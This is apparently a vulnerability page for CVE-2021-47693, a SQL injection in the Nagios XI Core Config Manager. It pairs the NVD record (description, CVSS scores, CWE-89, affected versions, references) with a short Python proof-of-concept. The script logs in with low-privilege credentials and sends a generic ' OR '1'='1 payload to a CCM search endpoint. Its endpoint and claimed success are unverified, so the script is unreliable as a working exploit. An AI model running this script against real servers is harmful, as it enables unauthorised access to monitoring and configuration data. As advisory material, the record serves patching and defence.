CVE-2021-47693

#!/usr/bin/env python3 # CVE-2021-47693 - Nagios XI CCM SQL Injection PoC # Requires valid low-privilege credentials import requests import sys from urllib.parse import urlencode target = "http://target-nagios-xi.local/nagiosxi/" username = "lowpriv_user" password = "password123" session = requests.Session() # Step 1: Authenticate login_url = target + "login.php" login_data = { "username": username, "password": password } resp = session.post(login_url, data=login_data, verify=False) if "nagiosxi" not in resp.url.lower(): print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") # Step 2: Exploit SQL Injection in CCM search ccm_url = target + "api/v1/objects/config/search" sqli_payload = "' OR '1'='1" params = {"search_text": sqli_payload} print(f"[*] Sending SQLi payload: {sqli_payload}") resp = session.get(ccm_url, params=params, verify=False) if resp.status_code == 200: print("[+] SQL Injection successful - Data exfiltrated") print(resp.text) else: print(f"[-] Exploitation failed with status: {resp.status_code}")

{"cve": {"id": "CVE-2021-47693", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:40.673", "lastModified": "2025-11-06T18:19:57.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Core Config Manager (CCM) in Nagios XI versions prior to CCM 3.1.3 / Nagios XI 5.8.5 contains a SQL injection vulnerability in the search text handling. Unsanitized user-supplied input was incorporated into SQL queries used by configuration object editors, allowing authenticated users to inject SQL fragments. Successful exploitation could lead to unauthorized disclosure or modification of configuration and application data, and in some environments could allow further compromise of the application or backend database."}, {"lang": "es", "value": "El Core Config Manager (CCM) en versiones de Nagios XI anteriores a CCM 3.1.3 / Nagios XI 5.8.5 contiene una vulnerabilidad de inyección SQL en el manejo del texto de búsqueda. Entrada de usuario no sanitizada se incorporó en consultas SQL utilizadas por los editores de objetos de configuración, permitiendo a usuarios autenticados inyectar fragmentos SQL. La explotación exitosa podría llevar a la divulgación o modificación no autorizada de datos de configuración y de la aplicación, y en algunos entornos podría permitir un mayor compromiso de la aplicación o de la base de datos backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.5", "matchCriteriaId": "16C2735A-6289-4DA5-B50A-E98B837C8B9B"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-ccm-sqli-via-improper-escaping-in-search-text", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}